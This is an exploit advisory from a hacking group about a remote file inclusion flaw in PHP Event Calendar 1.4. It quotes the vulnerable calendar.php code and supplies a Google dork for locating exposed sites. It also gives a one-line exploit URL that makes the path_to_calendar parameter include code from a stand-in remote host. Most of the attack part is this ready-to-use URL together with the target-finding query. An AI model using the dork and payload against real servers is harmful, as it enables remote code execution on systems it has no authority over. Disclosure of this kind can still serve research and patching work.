#############################SolpotCrew Community################################=0D
#=0D
#        PHP Event Calendar versi 1.4 (path_to_calendar) Remote File Inclusion =0D
#=0D
# Vendor site : http://www.softcomplex.com/products/php_event_calendar/=0D 
#=0D
#################################################################################=0D
#=0D
#=0D
#       Bug Found By :Solpot a.k.a (k. Hasibuan) (13th july 2006)=0D
#=0D
# contact: chris_hasibuan@yahoo.com =0D 
# =0D
# Website : http://www.solpotcrew.org/adv/solpot-adv-01.txt=0D 
#=0D
################################################################################=0D
#=0D
#=0D
#      Greetz: choi , h4ntu , Ibnusina , Lappet_tutung , ilalang23 , r4dja , =0D
#              L0sTBoy , Matdhule , setiawan , m3lky , NpR , Fungky , barbarosa=0D
#              home_edition2001 , Anggands , Rendy , cow_1seng=0D
#              and all crew #mardongan @ irc.dal.net=0D
#=0D
#=0D
###############################################################################=0D
Input passed to the "path_to_calendar" is not properly verified =0D
before being used to include files. This can be exploited to execute =0D
arbitrary PHP code by including files from local or external resources.=0D
=0D
code from calendar.php=0D
=0D
if(!$path_to_calendar){=0D
	$path_to_calendar = $_path_to_calendar;=0D
}=0D
extract($HTTP_POST_VARS);=0D
extract($HTTP_GET_VARS);=0D
include_once $path_to_calendar.'db.php';=0D
function show_calendar($index_calendar='') {=0D
	global $db,$path_to_data,$settings;=0D
=0D
Google dork : inurl:/cl_files/=0D
=0D
exploit : http://somehost/path_to_cl_files/calendar.php?path_to_calendar=http://evilcode=0D 
=0D
=0D
##############################MY LOVE JUST FOR U RIE#########################=0D
######################################E.O.F##################################=0D
=0D
=0D